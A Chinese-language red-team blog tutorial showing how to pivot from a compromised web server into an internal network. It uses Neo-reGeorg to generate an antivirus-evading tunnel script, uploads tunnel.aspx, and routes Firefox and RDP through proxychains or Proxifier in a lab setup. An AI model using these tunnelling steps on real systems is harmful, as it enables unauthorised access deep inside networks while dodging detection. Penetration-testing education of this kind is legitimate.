跳到主要內容
Neo-reGeorg + proxychains/proxifier 内網穿透
Neo-reGeorg + proxychains/proxifier 内網穿透
作者 : Noth
前言 :
拿到 Webshell 後,只是一個入口點而已,對於紅隊的成員遠遠不夠 xD 當客戶要求必須要拿到內網中的某一台主機權限,必須要想辦法滲透到內網當中,這時候我們可以透過 Neo-reGeorg 等 webproxy 工具代理進內網 :D 它的優勢是做了加密處理,避免特徵檢測,生成的腳本也免殺 ! 目前測試國內殺軟都不查殺該腳本,廢話不多,直接實戰。
示意圖 :
實作環境 :
攻擊者 : (192.168.137.130,kali,外網)
受害者 : (192.168.137.128,windows 2008,兩張網卡(內網/外網) )
受害者 : (10.10.10.128,windows 2003,內網)
內文 :
kali 生成 Neo_reGeorg 腳本 :
python3 neoreg.py generate -k noth
會新生成 neoreg_servers 目錄,裡面存放我們的 Web tunnel 腳本 :
將我們的 tunnel.aspx 上傳到受害者的 webserver 上面 (筆者上傳到根目錄) :
http://192.168.137.128/tunnel.aspx
執行程式 :
python3 neoreg.py -k noth -u http://192.168.137.128/tunnel.aspx
修改 proxychains.conf (/etc/proxychains.conf),修改成 127.0.0.1/1080 port :
開啟 firefox :
proxychains firefox
訪問 10.10.10.128
RDP :
proxychains rdesktop 10.10.10.128
成功登入 :
以上是在 Linux 下面用 Proxychains,在 windows 下面就是用 Proxifier :
設置代理服務器
設置代理規則 :
RDP :
成功連接 :
以上就是在 Linux / Windows 利用 WebProxy 代理進內網的過程 xD 對紅隊滲透人員來說這一步是非常重要的 xD 但要如何進內網後,又要隱匿自己的行蹤,筆者還在琢磨琢磨 :D 我始終相信著一句話,任何的專業都不是一蹴可及的 ! 正所謂千里之行,始於足下這個道理一般 ~
留言
張貼留言